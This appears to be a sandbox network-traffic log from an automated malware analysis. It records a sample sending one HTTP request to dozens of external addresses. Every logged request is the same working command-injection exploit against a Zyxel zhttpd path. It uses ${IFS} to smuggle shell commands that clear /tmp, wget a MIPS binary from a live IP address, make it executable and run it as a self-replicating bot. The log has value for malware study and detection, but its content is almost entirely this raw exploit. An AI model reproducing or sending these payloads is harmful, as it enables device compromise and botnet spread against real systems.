                                                        Feb 2, 2024 06:21:13.996103048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5345192.168.2.1445480206.208.35.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.996165991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5346192.168.2.144903845.233.187.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.996201992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5347192.168.2.1458876102.130.172.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.996244907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5348192.168.2.1457942145.98.195.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.996274948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5349192.168.2.145131854.168.149.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.996304035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5350192.168.2.143774889.16.143.194443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.996356964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5351192.168.2.1445680209.28.171.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.996396065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5352192.168.2.1437144172.235.192.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.996431112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5353192.168.2.145134014.1.60.26443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.996474981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5354192.168.2.1435640183.106.119.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.996541023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5355192.168.2.1453648192.189.168.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.996582985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5356192.168.2.1454216173.180.5.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.996618032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5357192.168.2.1459788107.203.46.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.996651888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5358192.168.2.14434985.141.122.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.996687889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5359192.168.2.145849671.125.136.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.996731043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5360192.168.2.145841450.152.0.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.996766090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5361192.168.2.1438958135.239.250.71443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.996825933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5362192.168.2.1446524222.223.238.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.996870041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5363192.168.2.1436042162.251.102.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.996901989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5364192.168.2.1451302115.241.58.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.996969938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5365192.168.2.145745052.156.87.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.997030020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5366192.168.2.1449178101.219.197.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.997062922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5367192.168.2.14565825.253.212.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.997113943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5368192.168.2.1460566133.220.82.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.997133970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5369192.168.2.145257674.193.232.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.997185946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5370192.168.2.144615250.152.199.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.997224092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5371192.168.2.143730473.22.207.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.997261047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5372192.168.2.143657849.88.25.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.997296095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5373192.168.2.1434654152.54.238.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.997337103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5374192.168.2.1450350134.171.80.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.997370005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5375192.168.2.145990842.247.180.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.997421026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5376192.168.2.145743631.215.251.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.997463942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5377192.168.2.1440538169.59.193.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.997488976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5378192.168.2.1434658191.117.147.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.997531891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5379192.168.2.1442250220.156.194.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.997580051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5380192.168.2.1451270132.135.80.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.997621059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5381192.168.2.1446782115.128.33.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.997648001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5382192.168.2.1446138125.137.107.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.997694016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5383192.168.2.144015223.199.246.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.997737885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5384192.168.2.144370459.204.33.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.997773886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5385192.168.2.1446564223.141.135.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.997816086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5386192.168.2.1451316130.55.87.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.997843981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5387192.168.2.145174235.46.124.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.997878075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5388192.168.2.1454292142.4.190.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.997929096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5389192.168.2.1454326134.61.149.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.997966051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5390192.168.2.145883837.41.186.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.997994900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5391192.168.2.1446716141.118.86.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.998029947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5392192.168.2.1455738145.198.44.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.998090029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5393192.168.2.143736062.239.208.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.998140097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5394192.168.2.1440138162.153.221.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.998162985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5395192.168.2.1450276122.48.60.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.998197079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5396192.168.2.145556659.250.176.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.998225927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5397192.168.2.1442538104.57.119.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.998284101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5398192.168.2.145073844.130.222.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.998298883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5399192.168.2.1446452165.1.168.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.998337030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5400192.168.2.1455790166.65.7.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.998389006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5401192.168.2.1437098136.84.231.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.998424053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5402192.168.2.14563885.214.67.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.998486042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5403192.168.2.1442116103.92.28.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.998512030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5404192.168.2.1454008142.37.201.171443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.998548031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5405192.168.2.1450670139.208.19.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.998593092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5406192.168.2.1452358222.240.225.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.998645067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5407192.168.2.145177085.98.193.163443
                                                        TimestampBytes transferredDirectionData
